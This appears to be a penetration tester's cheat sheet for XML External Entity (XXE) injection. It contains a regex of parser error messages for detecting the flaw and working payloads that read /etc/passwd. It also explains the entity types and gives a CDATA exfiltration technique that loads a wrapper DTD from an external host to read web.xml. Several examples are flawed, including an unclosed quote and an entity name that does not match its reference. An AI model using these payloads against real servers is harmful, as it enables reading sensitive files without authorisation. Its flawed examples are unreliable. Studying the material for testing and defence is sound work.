XEE Injection

Errors Regexp

simplexml_load_string|parser error :|An error occured!|xmlParseEntityDecl|simplexml_load_string|xmlParseInternalSubset|DOCTYPE improperly terminated|Start tag expected|No declaration for attribute|No declaration for element|failed to load external entity|Start tag expected|Invalid URI: file:\/\/\/|Malformed declaration expecting version|Unicode strings with encoding|must be well-formed|Content is not allowed in prolog|org.xml.sax|SAXParseException|com.sun.org.apache.xerces|ParseError|nokogiri|REXML|XML syntax error on line|Error unmarshaling XML|conflicts with field|illegal character code|XML Parsing Error|SyntaxError|no root element|not well-formed

Payload

<!DOCTYPE xxe_test [ <!ENTITY xxe_test SYSTEM "file:///etc/passwd"> ]><x>&xxe_test;</x>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe_test [ <!ENTITY xxe_test SYSTEM "file:///etc/passwd"> ]><x>&xxe_test;</x>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe_test [<!ELEMENT foo ANY><!ENTITY xxe_test SYSTEM "file:///etc/passwd">]><foo>&xxe_test;</foo>

XML External Entity (XXE) Injection Tips

XML Entities

Internal Entities

    <!ENTITY name "entity_value">
    #Example
    <!ENTITY test "<entity-value>test value</entity-value>">

External Entities

Private external entity

        <!ENTITY name SYSTEM "URI">
        # Example of private external entity
        <!ENTITY textinfo SYSTEM "http://domain.com>

Public External Entity

        <!ENTITY name PUBLIC "public_id" "URI">
        # Example
        <!ENTITY textinfo PUBLIC "-//W3C//TEXT orginfo//EN" "https://www.domain.com/orginfo.xml">

Parameter Entities (%)

    <!ENTITY % name SYSTEM "URI">
    # Example
    <!ENTITY % food 'Breakfast'>
    <!ENTITY Title 'Bacon & Eggs would be my %course;'>

Unparsed External Entities

    <!ENTITY name SYSTEM "URI" NDATA TYPE>
    <!ENTITY name PUBLIC "public_id" "URI" NDATA TYPE>

Test Payload

Using private External Entity

<?xml version="1.0" ?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY cat "Tom">
]>
<Contact>
<lastName>&cat;</lastName>
<firstName>Jerry</firstName>
</Contact>

Using a public External Entity

<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY lastname SYSTEM "file:///etc/passwd">
]>
<Contact>
<lastName>&cat;</lastName>
<firstName>Jerry</firstName>
</Contact>

CDATA

XXE that can print XML files through the CDATA:

    <?xml version="1.0"?>
    <!DOCTYPE data [
    <!ELEMENT data ANY >
    <!ENTITY % start "<![CDATA[">
    <!ENTITY % file SYSTEM "file:///var/www/html/myapp/WEB-INF/web.xml" >
    <!ENTITY % end "]]>">
    <!ENTITY % dtd SYSTEM "http://192.168.1.5:8000/wrapper.dtd" >
    %dtd;
    ]>
    <Contact>
    <lastName>&wrapper;</lastName>
    <firstName>FIRSTNAME_FILLER</firstName>
    </Contact>

Inside the wrapper.dtd (the external DTD file)
- Its purpose is just to wrap the variables(parameters) into 1
```
    <!ENTITY wrapper "%start;%file;%end;">
```